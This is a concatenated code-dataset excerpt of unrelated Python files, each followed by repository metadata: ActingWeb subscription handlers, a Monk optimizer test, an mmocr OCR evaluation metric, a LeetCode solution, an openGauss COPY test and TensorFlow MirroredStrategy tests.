    """ Handling requests to specific subscriptions, e.g. /subscriptions/<peerid>/12f2ae53bd"""

    def get(self, actor_id, peerid, subid):
        """Return all pending diffs for the subscription (without clearing)."""
        # ?_method=... tunnels PUT/DELETE through a GET.
        if self.request.get('_method') == 'PUT':
            self.put(actor_id, peerid, subid)
            return
        if self.request.get('_method') == 'DELETE':
            self.delete(actor_id, peerid, subid)
            return
        (myself, check) = auth.init_actingweb(appreq=self,
                                              actor_id=actor_id,
                                              path='subscriptions',
                                              subpath=peerid + '/' + subid,
                                              config=self.config)
        if not myself or check.response["code"] != 200:
            return
        if not check.check_authorisation(path='subscriptions', subpath='<id>/<id>', method='GET', peerid=peerid):
            self.response.set_status(403)
            return
        sub = myself.get_subscription_obj(peerid=peerid, subid=subid)
        sub_data = sub.get()
        if not sub_data or len(sub_data) == 0:
            self.response.set_status(404, "Subscription does not exist")
            return
        diffs = sub.get_diffs()
        pairs = []
        for diff in diffs:
            # Decode the stored diff as JSON if possible, otherwise pass raw.
            try:
                d = json.loads(diff["diff"])
            except (TypeError, ValueError, KeyError):
                d = diff["diff"]
            pairs.append({
                'sequence': diff["sequence"],
                'timestamp': diff["timestamp"].strftime('%Y-%m-%dT%H:%M:%S.%fZ'),
                'data': d,
            })
        if not pairs:
            self.response.set_status(404, 'No diffs available')
            return
        data = {
            'id': myself.id,
            'peerid': peerid,
            'subscriptionid': subid,
            'target': sub_data["target"],
            'subtarget': sub_data["subtarget"],
            'resource': sub_data["resource"],
            'data': pairs,
        }
        self.response.write(json.dumps(data))
        self.response.headers["Content-Type"] = "application/json"
        self.response.set_status(200, 'Ok')

    def put(self, actor_id, peerid, subid):
        """Acknowledge diffs up to and including 'sequence' (clears them)."""
        (myself, check) = auth.init_actingweb(appreq=self,
                                              actor_id=actor_id,
                                              path='subscriptions',
                                              subpath=peerid + '/' + subid,
                                              config=self.config)
        if not myself or check.response["code"] != 200:
            return
        if not check.check_authorisation(path='subscriptions', subpath='<id>/<id>', method='GET', peerid=peerid):
            self.response.set_status(403)
            return
        try:
            params = json.loads(self.request.body.decode('utf-8', 'ignore'))
            if 'sequence' in params:
                seq = params['sequence']
            else:
                self.response.set_status(400, "Error in json body and no GET parameters")
                return
        except (TypeError, ValueError, KeyError):
            # No usable JSON body; fall back to the GET parameter.
            seq = self.request.get('sequence')
            if len(seq) == 0:
                self.response.set_status(400, "Error in json body and no GET parameters")
                return
        try:
            # int() is a no-op for ints and parses numeric strings; catching
            # TypeError too means a JSON null yields a 400 instead of a 500.
            seqnr = int(seq)
        except (TypeError, ValueError):
            self.response.set_status(400, "Sequence does not contain a number")
            return
        sub = myself.get_subscription_obj(peerid=peerid, subid=subid)
        if not sub:
            self.response.set_status(404, "Subscription does not exist")
            return
        sub.clear_diffs(seqnr=seqnr)
        self.response.set_status(204)
        return

    def delete(self, actor_id, peerid, subid):
        """Delete the subscription (and its remote counterpart if we own it)."""
        (myself, check) = auth.init_actingweb(appreq=self,
                                              actor_id=actor_id,
                                              path='subscriptions',
                                              subpath=peerid + '/' + subid,
                                              config=self.config)
        if not myself or check.response["code"] != 200:
            return
        if not check.check_authorisation(path='subscriptions', subpath='<id>/<id>', method='GET', peerid=peerid):
            self.response.set_status(403)
            return
        # Do not delete remote subscription if this is from our peer
        if len(check.acl['peerid']) == 0:
            myself.delete_remote_subscription(peerid=peerid, subid=subid)
        if not myself.delete_subscription(peerid=peerid, subid=subid):
            self.response.set_status(404)
            return
        self.response.set_status(204)
        return
class SubscriptionDiffHandler(base_handler.BaseHandler):
    """ Handling requests to specific diffs for one subscription and clears it, e.g.
    /subscriptions/<peerid>/<subid>/112"""

    def get(self, actor_id, peerid, subid, seqnr):
        """Return diff number *seqnr* for the subscription and clear it."""
        (myself, check) = auth.init_actingweb(appreq=self,
                                              actor_id=actor_id,
                                              path='subscriptions',
                                              subpath=peerid + '/' + subid + '/' + str(seqnr),
                                              config=self.config)
        if not myself or check.response["code"] != 200:
            return
        if not check.check_authorisation(path='subscriptions', subpath='<id>/<id>', method='GET', peerid=peerid):
            self.response.set_status(403)
            return
        sub = myself.get_subscription_obj(peerid=peerid, subid=subid)
        # Bug fix: check the object for existence *before* dereferencing it —
        # the original called sub.get() first, which would raise on None.
        if not sub:
            self.response.set_status(404, "Subscription does not exist")
            return
        sub_data = sub.get()
        # Also 404 on an empty record, mirroring SubscriptionHandler.get.
        if not sub_data or len(sub_data) == 0:
            self.response.set_status(404, "Subscription does not exist")
            return
        seqnr = int(seqnr)  # the route parameter may arrive as a string
        diff = sub.get_diff(seqnr=seqnr)
        if not diff:
            self.response.set_status(404, 'No diffs available')
            return
        # Decode the stored diff as JSON if possible, otherwise pass raw.
        try:
            d = json.loads(diff["data"])
        except (TypeError, ValueError, KeyError):
            d = diff["data"]
        pairs = {
            'id': myself.id,
            'peerid': peerid,
            'subscriptionid': subid,
            'timestamp': diff["timestamp"].strftime('%Y-%m-%dT%H:%M:%S.%fZ'),
            'target': sub_data["target"],
            'subtarget': sub_data["subtarget"],
            'resource': sub_data["resource"],
            'sequence': seqnr,
            'data': d,
        }
        # Reading a specific diff is destructive: acknowledge (clear) it.
        sub.clear_diff(seqnr)
        self.response.write(json.dumps(pairs))
        self.response.headers["Content-Type"] = "application/json"
        self.response.set_status(200, 'Ok')
| 42.835227 | 119 | 0.523544 |
20e2f9eddb46477dd57563222eac66cbd1d46830 | 1,251 | py | Python | monk/system_unit_tests/pytorch/test_optimizer_adamax.py | Shreyashwaghe/monk_v1 | 4ee4d9483e8ffac9b73a41f3c378e5abf5fc799b | [
"Apache-2.0"
] | 7 | 2020-07-26T08:37:29.000Z | 2020-10-30T10:23:11.000Z | monk/system_unit_tests/pytorch/test_optimizer_adamax.py | mursalfk/monk_v1 | 62f34a52f242772186ffff7e56764e958fbcd920 | [
"Apache-2.0"
] | 9 | 2020-01-28T21:40:39.000Z | 2022-02-10T01:24:06.000Z | monk/system_unit_tests/pytorch/test_optimizer_adamax.py | mursalfk/monk_v1 | 62f34a52f242772186ffff7e56764e958fbcd920 | [
"Apache-2.0"
] | 1 | 2020-10-07T12:57:44.000Z | 2020-10-07T12:57:44.000Z | import os
import sys
sys.path.append("../../../monk/");
import psutil
from pytorch_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
def test_optimizer_adamax(system_dict):
    """System test: train for two epochs with the Adamax optimizer.

    Updates the pass/fail/skip counters and lists in *system_dict* and
    returns the (mutated) dict.
    """
    forward = True;
    test = "test_optimizer_adamax";
    system_dict["total_tests"] += 1;
    print_start(test, system_dict["total_tests"])
    if(forward):
        try:
            gtf = prototype(verbose=0);
            gtf.Prototype("sample-project-1", "sample-experiment-1");
            gtf.Default(dataset_path="../../system_check_tests/datasets/dataset_cats_dogs_train",
                        model_name="resnet18", freeze_base_network=True, num_epochs=2);
            gtf.optimizer_adamax(0.01, weight_decay=0.0001, beta1=0.9, beta2=0.999);
            gtf.Train();
            system_dict["successful_tests"] += 1;
            print_status("Pass");
        except Exception as e:
            # Record the failure details instead of aborting the whole run.
            system_dict["failed_tests_exceptions"].append(e);
            system_dict["failed_tests_lists"].append(test);
            forward = False;
            print_status("Fail");
    else:
        system_dict["skipped_tests_lists"].append(test);
        print_status("Skipped");
    return system_dict
| 32.921053 | 98 | 0.64988 |
86973fd76bef29874d88f521cfbfb2e4054e46ec | 5,727 | py | Python | mmocr/core/evaluation/ocr_metric.py | zezeze97/image2latex | c745667cd1af91dbff2385dcf2f2b80b9a40adb6 | [
"Apache-2.0"
] | 4 | 2022-01-03T06:52:30.000Z | 2022-01-17T02:30:25.000Z | mmocr/core/evaluation/ocr_metric.py | zezeze97/image2latex | c745667cd1af91dbff2385dcf2f2b80b9a40adb6 | [
"Apache-2.0"
] | null | null | null | mmocr/core/evaluation/ocr_metric.py | zezeze97/image2latex | c745667cd1af91dbff2385dcf2f2b80b9a40adb6 | [
"Apache-2.0"
] | 1 | 2021-12-31T04:47:16.000Z | 2021-12-31T04:47:16.000Z | import re
from difflib import SequenceMatcher
from rapidfuzz import string_metric
from nltk.translate.bleu_score import sentence_bleu
import numpy as np
def cal_true_positive_char(pred, gt):
    """Calculate correct character number in prediction.

    Args:
        pred (str): Prediction text.
        gt (str): Ground truth text.

    Returns:
        true_positive_char_num (int): The true positive number.
    """
    matcher = SequenceMatcher(None, pred, gt)
    # Sum the lengths of the gt-side spans of every 'equal' opcode; the other
    # opcode kinds (replace/delete/insert) contribute nothing. This replaces
    # the manual accumulator loop with its dead `else: pass` branch.
    return sum(e2 - s2
               for opt, _, _, s2, e2 in matcher.get_opcodes()
               if opt == 'equal')
def count_matches(pred_texts, gt_texts):
    """Count the various match number for metric calculation.

    Args:
        pred_texts (list[str]): Predicted text string.
        gt_texts (list[str]): Ground truth text string.

    Returns:
        match_res: (dict[str: int]): Match number used for
            metric calculation.
    """
    match_res = {
        'gt_char_num': 0,
        'pred_char_num': 0,
        'true_positive_char_num': 0,
        'gt_word_num': 0,
        'match_word_num': 0,
        'match_word_ignore_case': 0,
        'match_word_ignore_case_symbol': 0,
        'bleu':0
    }
    # Pattern matching everything EXCEPT ASCII letters, digits and CJK
    # ideographs; used to strip symbols for the "ignore symbol" metrics.
    comp = re.compile('[^A-Z^a-z^0-9^\u4e00-\u9fa5]')
    norm_ed_sum = 0.0;bleu_score = []
    for pred_text, gt_text in zip(pred_texts, gt_texts):
        current_bleu = sentence_bleu([gt_text], pred_text)
        bleu_score.append(current_bleu)
        # Join each token sequence into a single string with every token
        # followed by one space, so the comparisons below operate on whole
        # sequences. NOTE(review): if pred_text/gt_text are plain strings
        # this iterates characters — presumably they are token lists; confirm
        # against the caller.
        pred_text_str = ''
        for item in pred_text:
            toeken = item + ' '
            pred_text_str += toeken
        gt_text_str = ''
        for item in gt_text:
            toeken = item + ' '
            gt_text_str += toeken
        pred_text = pred_text_str
        gt_text = gt_text_str
        if gt_text == pred_text:
            match_res['match_word_num'] += 1
        gt_text_lower = gt_text.lower()
        pred_text_lower = pred_text.lower()
        if gt_text_lower == pred_text_lower:
            match_res['match_word_ignore_case'] += 1
        else:
            # Debug output for predictions that mismatch case-insensitively.
            print('*'*60)
            print('Pred : {}'.format(pred_text_lower))
            print('GtGt : {}'.format(gt_text_lower))
            print('BLEU: {}'.format(current_bleu))
        gt_text_lower_ignore = comp.sub('', gt_text_lower)
        pred_text_lower_ignore = comp.sub('', pred_text_lower)
        if gt_text_lower_ignore == pred_text_lower_ignore:
            match_res['match_word_ignore_case_symbol'] += 1
        match_res['gt_word_num'] += 1
        # normalized edit distance
        edit_dist = string_metric.levenshtein(pred_text_lower_ignore,
                                              gt_text_lower_ignore)
        norm_ed = float(edit_dist) / max(1, len(gt_text_lower_ignore),
                                         len(pred_text_lower_ignore))
        norm_ed_sum += norm_ed
        # number to calculate char level recall & precision
        match_res['gt_char_num'] += len(gt_text_lower_ignore)
        match_res['pred_char_num'] += len(pred_text_lower_ignore)
        true_positive_char_num = cal_true_positive_char(
            pred_text_lower_ignore, gt_text_lower_ignore)
        match_res['true_positive_char_num'] += true_positive_char_num
    normalized_edit_distance = norm_ed_sum / max(1, len(gt_texts))
    match_res['ned'] = normalized_edit_distance
    match_res['bleu'] = np.mean(bleu_score)
    return match_res
def eval_ocr_metric(pred_texts, gt_texts):
    """Evaluate text recognition results against ground truth.

    Word accuracy and 1-N.E.D. follow the protocol described at
    https://rrc.cvc.uab.es/?ch=14&com=tasks.

    Args:
        pred_texts (list[str]): Predicted text strings.
        gt_texts (list[str]): Ground-truth text strings.

    Returns:
        dict[str: float]: Metrics rounded to 4 decimal places:
            - word_acc: accuracy at word level.
            - word_acc_ignore_case: word-level accuracy, case-insensitive.
            - word_acc_ignore_case_symbol: word-level accuracy ignoring
              letter case and symbols (default metric for academic
              evaluation).
            - char_recall / char_precision: character-level recall and
              precision, ignoring case and symbols.
            - 1-N.E.D: 1 - normalized edit distance.
            - BLEU: mean sentence BLEU score.
    """
    assert isinstance(pred_texts, list)
    assert isinstance(gt_texts, list)
    assert len(pred_texts) == len(gt_texts)

    match_res = count_matches(pred_texts, gt_texts)
    # Small epsilon keeps every ratio well-defined when a count is zero.
    eps = 1e-8
    true_positives = match_res['true_positive_char_num']
    gt_words = eps + match_res['gt_word_num']

    eval_res = {
        'word_acc': 1.0 * match_res['match_word_num'] / gt_words,
        'word_acc_ignore_case':
            1.0 * match_res['match_word_ignore_case'] / gt_words,
        'word_acc_ignore_case_symbol':
            1.0 * match_res['match_word_ignore_case_symbol'] / gt_words,
        'char_recall': 1.0 * true_positives / (eps + match_res['gt_char_num']),
        'char_precision':
            1.0 * true_positives / (eps + match_res['pred_char_num']),
        '1-N.E.D': 1.0 - match_res['ned'],
        'BLEU': match_res['bleu'],
    }
    # Report every metric truncated to 4 decimal places.
    return {key: float('{:.4f}'.format(val)) for key, val in eval_res.items()}
| 36.477707 | 79 | 0.632094 |
1d6c853f0410688dcc4549d1e659b2ceab243495 | 1,199 | py | Python | Easy/169. Majority Element/solution (5).py | czs108/LeetCode-Solutions | 889f5b6a573769ad077a6283c058ed925d52c9ec | [
"MIT"
] | 3 | 2020-05-09T12:55:09.000Z | 2022-03-11T18:56:05.000Z | Easy/169. Majority Element/solution (5).py | czs108/LeetCode-Solutions | 889f5b6a573769ad077a6283c058ed925d52c9ec | [
"MIT"
] | null | null | null | Easy/169. Majority Element/solution (5).py | czs108/LeetCode-Solutions | 889f5b6a573769ad077a6283c058ed925d52c9ec | [
"MIT"
] | 1 | 2022-03-11T18:56:16.000Z | 2022-03-11T18:56:16.000Z | # 169. Majority Element
# Runtime: 316 ms, faster than 5.22% of Python3 online submissions for Majority Element.
# Memory Usage: 15.4 MB, less than 7.14% of Python3 online submissions for Majority Element.
class Solution:
    # Divide and Conquer
    def majorityElement(self, nums: list[int]) -> int:
        """Return the majority element of *nums* via divide and conquer."""

        def candidate(lo: int, hi: int) -> int:
            # An array of size 1 is its own majority element.
            if lo == hi:
                return nums[lo]
            # Find the majority candidate of each half of this slice.
            mid = lo + (hi - lo) // 2
            left_cand = candidate(lo, mid)
            right_cand = candidate(mid + 1, hi)
            # Agreement between halves settles the slice immediately.
            if left_cand == right_cand:
                return left_cand
            # Otherwise count both candidates over the slice and keep the winner.
            window = nums[lo:hi + 1]
            left_votes = window.count(left_cand)
            right_votes = window.count(right_cand)
            return left_cand if left_votes > right_votes else right_cand

        return candidate(0, len(nums) - 1)
40783d19fb80f53608704a606da1618ffa30a13f | 5,189 | py | Python | openGaussBase/testcase/SQL/DML/copy/Opengauss_Function_DML_Copy_Case0013.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | openGaussBase/testcase/SQL/DML/copy/Opengauss_Function_DML_Copy_Case0013.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | openGaussBase/testcase/SQL/DML/copy/Opengauss_Function_DML_Copy_Case0013.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | """
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 拷贝数据
Case Name : 表字段数少于文件表数据字段数时,是否会给出合理报错
Description :
1.创建测试表并插入数据
2.构造数据文件(多字段表)
3.从文件中拷贝数据到表(少字段表)
4.进行校验
Expect :
1.创建测试表并插入数据成功
2.构造数据文件(多字段表)成功
3.从文件中拷贝数据到表(少字段表),合理报错
4.进行校验
"""
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.CommonSH import *
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
logger = Logger()
class CopyFile(unittest.TestCase):
    """Opengauss_Function_DML_Copy_Case0013.

    Verifies that COPY FROM into a table with fewer columns than the data
    file fails with a reasonable error, and that the target table's
    original rows are left intact.
    """
    def setUp(self):
        # Connect to the primary node and cache env/instance paths and
        # expected-message constants used by the assertions below.
        logger.info('----------------------------Opengauss_Function_DML_Copy_Case0013开始执行-----------------------------')
        self.userNode = Node('PrimaryDbUser')
        self.DB_ENV_PATH = macro.DB_ENV_PATH
        self.DB_INSTANCE_PATH = macro.DB_INSTANCE_PATH
        self.sh_primy = CommonSH('PrimaryDbUser')
        self.Constant = Constant()
    def test_copy_file(self):
        # Step 1: create a 4-column source table (testzl) and a 3-column
        # target table (testcopy), each seeded with three rows.
        logger.info('----------------------------创建测试表并插入数据-----------------------------')
        sql_cmd = '''drop table if exists testzl;
        CREATE TABLE testzl(SK INTEGER,ID CHAR(16),NAME VARCHAR(20),SQ_FT INTEGER);
        insert into testzl values (001,'sk1','tt',3332);
        insert into testzl values (001,'sk1','tt',3332);
        insert into testzl values (001,'sk1','tt',3332);
        drop table if exists testcopy;
        CREATE TABLE testcopy(a INTEGER,b CHAR(16),c VARCHAR(20));
        insert into testcopy values (001,'sk1','tt');
        insert into testcopy values (001,'sk1','tt');
        insert into testcopy values (001,'sk1','tt');
        '''
        excute_cmd = f'''
        source {self.DB_ENV_PATH} ;
        gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
        '''
        logger.info(excute_cmd)
        msg = self.userNode.sh(excute_cmd).result()
        logger.info(msg)
        self.assertIn(self.Constant.INSERT_SUCCESS_MSG, msg)
        # Step 2: export the 4-column table to a data file under the
        # instance directory (COPY TO must succeed — no error expected).
        logger.info('----------------------------构造数据文件-----------------------------')
        sql_cmd = f'''copy testzl to '{self.DB_INSTANCE_PATH}/pg_copydir/testzl.dat';'''
        excute_cmd = f'''mkdir {self.DB_INSTANCE_PATH}/pg_copydir;
        touch {self.DB_INSTANCE_PATH}/pg_copydir/testzl.dat;
        source {self.DB_ENV_PATH} ;
        gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
        '''
        logger.info(excute_cmd)
        msg = self.userNode.sh(excute_cmd).result()
        logger.info(msg)
        self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], msg)
        # Step 3: import the 4-column file into the 3-column table; this
        # must fail with the extra-column COPY error.
        logger.info('--------------------------从文件中拷贝数据到表,失败---------------------------')
        sql_cmd = f'''copy testcopy from '{self.DB_INSTANCE_PATH}/pg_copydir/testzl.dat';
        select * from testcopy;'''
        excute_cmd = f'''
        source {self.DB_ENV_PATH} ;
        gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
        '''
        logger.info(excute_cmd)
        msg = self.userNode.sh(excute_cmd).result()
        logger.info(msg)
        self.assertIn(self.Constant.COPY_COLUMN_ERROR_MSG, msg)
        # Step 4: verify the failed COPY left the target table untouched
        # (still exactly the 3 rows inserted in step 1).
        logger.info('---------------------------进行校验---------------------------')
        sql_cmd = f'''select count(*) from testcopy ;'''
        excute_cmd = f'''
        source {self.DB_ENV_PATH} ;
        gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
        '''
        logger.info(excute_cmd)
        msg = self.userNode.sh(excute_cmd).result()
        logger.info(msg)
        # gsql output: the count value sits on the second-to-last line.
        res = msg.splitlines()[-2].strip()
        self.assertIn('3', res)
        logger.info(res)
    def tearDown(self):
        # Drop both tables and remove the copy directory created by the test.
        logger.info('----------------------------清理环境-----------------------------')
        sql_cmd = '''
        drop table if exists testcopy;
        drop table if exists testzl;'''
        excute_cmd = f'''
        rm -rf {self.DB_INSTANCE_PATH}/pg_copydir
        source {self.DB_ENV_PATH} ;
        gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
        '''
        logger.info(excute_cmd)
        msg = self.userNode.sh(excute_cmd).result()
        logger.info(msg)
        self.assertIn(self.Constant.TABLE_DROP_SUCCESS, msg)
        logger.info('------------------Opengauss_Function_DML_Copy_Case0013执行完成-----------------------------')
25d9e55954f247f22c34f836b695731c6f3c13c2 | 57,725 | py | Python | tensorflow/python/distribute/mirrored_strategy_test.py | AdamHillier/tensorflow | 6780ebf4858a56fd0745f03fa5a61b249559f3cd | [
"Apache-2.0"
] | 2 | 2020-09-22T17:41:12.000Z | 2021-03-14T20:40:59.000Z | tensorflow/python/distribute/mirrored_strategy_test.py | AdamHillier/tensorflow | 6780ebf4858a56fd0745f03fa5a61b249559f3cd | [
"Apache-2.0"
] | 1 | 2021-03-23T03:25:15.000Z | 2021-03-23T03:25:15.000Z | tensorflow/python/distribute/mirrored_strategy_test.py | AdamHillier/tensorflow | 6780ebf4858a56fd0745f03fa5a61b249559f3cd | [
"Apache-2.0"
] | 2 | 2021-03-16T02:21:33.000Z | 2021-11-08T21:24:51.000Z | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MirroredStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import sys
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import tf2
from tensorflow.python.autograph.core import converter_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import distribution_strategy_context as ds_context
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import mirrored_strategy
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute import strategy_test_lib
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute import values
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as tf_device
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gradients
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.training import server_lib
GPU_TEST = "test_gpu" in sys.argv[0]
@combinations.generate(
    combinations.combine(
        distribution=[
            strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
            strategy_combinations.mirrored_strategy_with_two_gpus,
            strategy_combinations.mirrored_strategy_with_two_gpus_no_merge_call,
        ],
        mode=["graph", "eager"]))
class MirroredTwoDeviceDistributionTest(
    strategy_test_lib.DistributionTestBase,
    strategy_test_lib.TwoDeviceDistributionTestBase,
    parameterized.TestCase):
  """Tests MirroredStrategy on two-device configs (GPU+CPU, 2xGPU).

  Most cases delegate to helpers inherited from DistributionTestBase /
  TwoDeviceDistributionTestBase; the remainder exercise reduce semantics,
  input pipelines and prefetch placement directly.
  """
  def testMinimizeLoss(self, distribution):
    if context.executing_eagerly():
      self._test_minimize_loss_eager(distribution)
    else:
      self._test_minimize_loss_graph(distribution)
  def testReplicaId(self, distribution):
    self._test_replica_id(distribution)
  def testNumReplicasInSync(self, distribution):
    # All parameterized strategies above use exactly two devices.
    self.assertEqual(2, distribution.num_replicas_in_sync)
  def testCallAndMergeExceptions(self, distribution):
    self._test_call_and_merge_exceptions(distribution)
  def testRunRegroupError(self, distribution):
    if not getattr(distribution, "_use_merge_call", True):
      self.skipTest("Collective all-reduce does not support int32 on GPU.")
    def run_fn():
      replica_id = int(self.evaluate(_replica_id()))
      # Generates a list with different lengths on different devices.
      # Will fail in _regroup() (if more than one device).
      return list(range(replica_id))
    with distribution.scope(), self.assertRaises(AssertionError):
      distribution.extended.call_for_each_replica(run_fn)
  def testReduceToCpu(self, distribution):
    if not getattr(distribution, "_use_merge_call", True):
      self.skipTest("Collective all-reduce does not support int32 on GPU.")
    with distribution.scope():
      result = distribution.extended.call_for_each_replica(_replica_id)
      # SUM over per-replica ids == 0 + 1 + ... + (num_replicas - 1).
      reduced = distribution.reduce(reduce_util.ReduceOp.SUM, result, axis=None)
      expected = sum(range(distribution.num_replicas_in_sync))
      self.assertEqual(expected, self.evaluate(reduced))
  def testReduceToCpuNested(self, distribution):
    """Reduce of a nested (tuple) per-replica structure."""
    if not getattr(distribution, "_use_merge_call", True):
      self.skipTest("Collective all-reduce does not support int32 on GPU.")
    with distribution.scope():
      def replica_fn(input_tensor):
        return input_tensor + constant_op.constant(
            1.0), input_tensor - constant_op.constant(1.0)
      input_tensor = constant_op.constant(3.0)
      run_result = distribution.run(replica_fn, args=(input_tensor,))
      reduced_result = distribution.reduce("SUM", run_result, axis=None)
      expected_result = (4 * distribution.num_replicas_in_sync,
                         2 * distribution.num_replicas_in_sync)
      self.assertEqual(expected_result, self.evaluate(reduced_result))
  def reduce_axis_helper(self, distribution, replica_squared_fn):
    """Checks SUM and MEAN reduction along axis 0 of per-replica results.

    `replica_squared_fn` is expected to return, on replica i, a list of
    i+1 copies of the value i (see the callers below).
    """
    with distribution.scope():
      num_replicas = distribution.num_replicas_in_sync
      result = distribution.extended.call_for_each_replica(replica_squared_fn)
      # sum
      reduced = distribution.reduce(reduce_util.ReduceOp.SUM, result, axis=0)
      expected = sum(x * (x + 1) for x in range(num_replicas))
      self.assertNear(expected, self.evaluate(reduced), 0.00001)
      # mean
      reduced = distribution.reduce(reduce_util.ReduceOp.MEAN, result, axis=0)
      expected /= sum(x + 1 for x in range(num_replicas))
      self.assertNear(expected, self.evaluate(reduced), 0.00001)
  def testReduceAxisToCpu(self, distribution):
    if not getattr(distribution, "_use_merge_call", True):
      self.skipTest("Collective all-reduce does not support int32 on GPU.")
    for dtype in (dtypes.float32, dtypes.int32):
      def replica_squared_fn(dtype=dtype):
        # Lists with different lengths on different replicas.
        replica_id = _replica_id_as_int()
        return array_ops.identity(
            math_ops.cast([replica_id] * (replica_id + 1), dtype))
      self.reduce_axis_helper(distribution, replica_squared_fn)
  def set_v2_tensorshape(self, v2):
    # Toggle between TensorShape v1 and v2 behavior for the test below.
    if v2:
      tensor_shape.enable_v2_tensorshape()
    else:
      tensor_shape.disable_v2_tensorshape()
  def testReduceAxisToCpuUnknownShape(self, distribution):
    """Axis reduce with statically-unknown size/rank, under both
    TensorShape v1 and v2 behavior; restores the original setting."""
    if not getattr(distribution, "_use_merge_call", True):
      self.skipTest("Collective all-reduce does not support int32 on GPU.")
    original_v2 = tensor_shape._TENSORSHAPE_V2_OVERRIDE  # pylint: disable=protected-access
    try:
      for v2 in (False, True):
        self.set_v2_tensorshape(v2)
        for dtype in (dtypes.float32, dtypes.int32):
          for shape in ((None,), None):  # Test both unknown size and rank.
            def replica_squared_fn(dtype=dtype, shape=shape):
              # Lists with different lengths on different replicas.
              replica_id = _replica_id_as_int()
              tensor = math_ops.cast([replica_id] * (replica_id + 1), dtype)
              # Erase shape information
              return array_ops.placeholder_with_default(tensor, shape=shape)
            self.reduce_axis_helper(distribution, replica_squared_fn)
    finally:
      self.set_v2_tensorshape(original_v2)
  def testReplicateDataset(self, distribution):
    if tf2.enabled() and not context.executing_eagerly():
      self.skipTest("Skipping test since we do not support graph mode in TF 2")
    dataset_fn = lambda: dataset_ops.Dataset.range(10)
    # With 2 replicas, each step consumes consecutive pairs [i, i+1].
    expected_values = [[i, i+1] for i in range(0, 10, 2)]
    input_fn = self._input_fn_to_test_input_context(
        dataset_fn,
        expected_num_replicas_in_sync=2,
        expected_num_input_pipelines=1,
        expected_input_pipeline_id=0)
    self._test_input_fn_iterable(distribution, input_fn, expected_values)
  def testMakeInputFnIteratorWithDataset(self, distribution):
    dataset_fn = lambda: dataset_ops.Dataset.range(10)
    expected_values = [[i, i+1] for i in range(0, 10, 2)]
    input_fn = self._input_fn_to_test_input_context(
        dataset_fn,
        expected_num_replicas_in_sync=2,
        expected_num_input_pipelines=1,
        expected_input_pipeline_id=0)
    iterator = distribution.make_input_fn_iterator(input_fn)
    self._test_input_fn_iterator(iterator, distribution.extended.worker_devices,
                                 expected_values)
  def testMakeInputFnIteratorWithCallable(self, distribution):
    # Input fn returns a get_next callable rather than a dataset; the
    # interleave makes element order nondeterministic, hence ignore_order.
    def fn():
      dataset = dataset_ops.Dataset.range(2).interleave(
          (lambda _: dataset_ops.Dataset.range(10)), cycle_length=2)
      it = dataset_ops.make_one_shot_iterator(dataset)
      return it.get_next
    expected_values = [[i, i] for i in range(0, 10)]
    input_fn = self._input_fn_to_test_input_context(
        fn,
        expected_num_replicas_in_sync=2,
        expected_num_input_pipelines=1,
        expected_input_pipeline_id=0)
    iterator = distribution.make_input_fn_iterator(input_fn)
    self._test_input_fn_iterator(iterator, distribution.extended.worker_devices,
                                 expected_values, test_reinitialize=False,
                                 ignore_order=True)
  def testNumpyDataset(self, distribution):
    self._test_numpy_dataset(distribution)
  def testGlobalStepUpdate(self, distribution):
    self._test_global_step_update(distribution)
